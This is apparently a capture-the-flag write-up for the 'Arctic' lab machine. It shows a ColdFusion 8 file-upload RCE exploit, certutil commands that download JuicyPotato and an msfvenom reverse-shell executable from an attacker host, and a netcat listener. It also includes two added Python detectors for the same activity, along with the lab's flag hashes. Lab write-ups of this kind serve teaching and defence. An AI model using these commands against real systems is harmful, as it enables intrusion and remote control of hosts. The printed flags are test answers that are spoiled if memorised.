1/19/24
easy
Enum
sudo nmap -sC -sV -v -o nmap -T4 10.10.10.11 -Pn
Open ports 135, 8500, 49154
From that output, 8500 stands out; visiting it in a web browser shows some interesting directories. Exploring each:
Looks like config files for something. Googling the directory names:
CFIDE + port 8500 indicates ColdFusion, which looks like a server management solution.
Let's try to find a login panel or something.
CFIDE/
Parent .. dir 01/20/24 04:31 μμ
Application.cfm 1151 03/18/08 11:06 πμ
adminapi/ dir 03/22/17 08:53 μμ
administrator/ dir 03/22/17 08:55 μμ
classes/ dir 03/22/17 08:52 μμ
componentutils/ dir 03/22/17 08:52 μμ
debug/ dir 03/22/17 08:52 μμ
images/ dir 03/22/17 08:52 μμ
install.cfm 12077 03/18/08 11:06 πμ
multiservermonitor-access-policy.xml 278 03/18/08 11:07 πμ
probe.cfm 30778 03/18/08 11:06 πμ
scripts/ dir 03/22/17 08:52 μμ
shell.jsp 1499 01/20/24 04:41 μμ
wizards/ dir 03/22/17 08:52 μμ
CFIDE/administrator/ is a login panel.
We also see the ColdFusion version: ColdFusion 8.
Exploit Analysis
Low hanging CVE?
searchsploit ColdFusion 8
Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py
Looks promising, let's try.
searchsploit -m 50057
Reading through the code, the main portions are:
- Generating a JSP payload (with msfvenom in this case)
- Posting the payload to the directory:
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/
- Requesting the newly uploaded payload to execute it.
Let's see if it's as easy as running it.
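From the defender's side, the three steps above leave a recognisable trace in the web server access log: a request to the FCKeditor connector's upload.cfm, followed shortly by a request for a .jsp file under /CFIDE/ from the same client. The following detection script is an added example, not part of the original writeup or of exploit 50057; the IIS-style log lines are constructed, the upload landing under /CFIDE/ is an assumption based on the shell.jsp seen in the directory listing, and the 10-minute correlation window is an arbitrary choice.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in IIS W3C extended format (assumed field order):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2024-01-20 16:40:01 10.10.14.43 GET /CFIDE/administrator/index.cfm - 200
2024-01-20 16:41:10 10.10.14.43 POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm Command=FileUpload&Type=File&CurrentFolder=/ 200
2024-01-20 16:41:12 10.10.14.43 GET /CFIDE/shell.jsp - 200
2024-01-20 16:45:00 10.10.14.50 GET /CFIDE/images/logo.gif - 200
2024-01-20 17:30:00 10.10.14.60 GET /CFIDE/probe.cfm - 200
"""

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<path>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)

# The FCKeditor file-manager connector that the exploit posts to (lower-cased for comparison).
UPLOAD_CONNECTOR = "/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm"
# Assumed window: an upload followed by a script request within it is treated as one chain.
CHAIN_WINDOW = timedelta(minutes=10)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{m['date']} {m['time']}", "%Y-%m-%d %H:%M:%S")
    return {
        "ts": ts,
        "ip": m["ip"],
        "method": m["method"],
        "path": m["path"].lower(),
        "query": m["query"],
        "status": int(m["status"]),
    }


def detect(log_text):
    """Return a list of (severity, rule, client_ip, path) alerts for the given log text."""
    alerts = []
    last_upload = {}  # client ip -> timestamp of its most recent upload.cfm request
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        # Rule 1: any request to the connector itself is suspicious on a production server.
        if ev["path"] == UPLOAD_CONNECTOR:
            alerts.append(("high", "fckeditor-upload-connector", ev["ip"], ev["path"]))
            last_upload[ev["ip"]] = ev["ts"]
        # Rule 2: a JSP served from under /CFIDE/ is not expected content.
        if ev["path"].startswith("/cfide/") and ev["path"].endswith((".jsp", ".jspx")):
            alerts.append(("high", "jsp-under-cfide", ev["ip"], ev["path"]))
            # Rule 3: correlate with a recent upload from the same client (upload-then-execute).
            t = last_upload.get(ev["ip"])
            if t is not None and ev["ts"] - t <= CHAIN_WINDOW and ev["status"] == 200:
                alerts.append(("critical", "upload-then-execute", ev["ip"], ev["path"]))
    return alerts


if __name__ == "__main__":
    for severity, rule, ip, path in detect(SAMPLE_LOG):
        print(f"[{severity}] {rule}: {ip} -> {path}")
```

The per-client correlation is what separates a scanner probing the connector from a completed upload-and-execute chain; the first two rules fire on their own, the third only when both halves come from the same address within the window.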
Exploitation
python3 50057.py
Simple as that!
net users
User accounts for \\ARCTIC
-------------------------------------------------------------------------------
Administrator Guest tolis
The command completed successfully.
Looks like we are already at user level, let's grab that flag.
862cff073b113be4685a3f095694f818
Alright, how can we priv esc?
Looks like we are in some privileged groups and have some user privs enabled.
We have SeImpersonatePrivilege, which is usually a good indicator that JuicyPotato will work.
Privilege Escalation
Read more about potato attacks here:
- We need the CLSID for JP to work. Let's find out what version of Windows we are on.
systeminfo
We are on Microsoft Windows Server 2008 R2; we can look up the CLSIDs for this particular OS here:
Let's grab the binary and transfer it to the machine.
On our attack box
https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
Host on webserver
python3 -m http.server 80
On target machine
certutil -urlcache -f http://10.10.14.43/JuicyPotato.exe JP.exe
Now we need something for JuicyPotato to launch with higher privs; we can generate an msfvenom payload for this.
On attack box
msfvenom -p windows/x64/shell_reverse_tcp LPORT=42069 -f exe -o sh.exe LHOST=10.10.14.43
Now transfer the same way
On target machine
certutil -urlcache -f http://10.10.14.43/sh.exe sh.exe
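Both transfers above use certutil as a download tool, which is a common thing to alert on from the defender's side: certutil -urlcache with an http(s) URL in a process-creation event is rarely legitimate on a server. The check below is an added example, not part of the original writeup; the process-creation records are constructed stand-ins for the command-line field of Windows 4688 or Sysmon event 1 records, and the severity weighting is an assumption.

```python
import re

# Constructed process-creation records reduced to the fields this check needs
# (assumed shape; real 4688 / Sysmon event 1 records carry many more fields).
SAMPLE_EVENTS = [
    {"user": "ARCTIC\\tolis", "image": "certutil.exe",
     "cmdline": "certutil -urlcache -f http://10.10.14.43/JP.exe JP.exe"},
    {"user": "ARCTIC\\tolis", "image": "certutil.exe",
     "cmdline": "certutil -urlcache -f http://10.10.14.43/sh.exe sh.exe"},
    {"user": "ARCTIC\\tolis", "image": "certutil.exe",
     "cmdline": "certutil -verify cert.cer"},
    {"user": "NT AUTHORITY\\SYSTEM", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# certutil invoked with -urlcache and a remote URL: the download-tool pattern.
CERTUTIL_DOWNLOAD = re.compile(
    r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*\b(?P<url>https?://\S+)",
    re.IGNORECASE,
)
# A trailing output path ending in an executable extension raises the severity.
EXEC_OUTPUT = re.compile(r"\s(?P<out>\S+\.(?:exe|dll|bat|ps1|vbs))\s*$", re.IGNORECASE)


def check_event(event):
    """Return an alert dict if the event looks like a certutil download, else None."""
    m = CERTUTIL_DOWNLOAD.search(event["cmdline"])
    if not m:
        return None
    out = EXEC_OUTPUT.search(event["cmdline"])
    return {
        "severity": "high" if out else "medium",
        "rule": "certutil-urlcache-download",
        "user": event["user"],
        "url": m.group("url"),
        "output": out.group("out") if out else None,
    }


def scan(events):
    """Run check_event over a list of records and return the alerts that fired."""
    return [a for a in (check_event(e) for e in events) if a is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The third record shows why the rule keys on -urlcache plus a URL rather than on certutil alone: certificate verification is a normal use of the same binary and should not fire.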
Start by listening on your attack box 💬
nc -lvnp 42069
Now, let's launch JP.exe with the following args:
JP.exe -l 1337 -p C:\Users\tolis\Documents\sh.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}
We got a shell back!
Are we NT AUTHORITY\SYSTEM? 🤔
AYYYYY 🥳
489bb32a998da6937df67d6b27524d50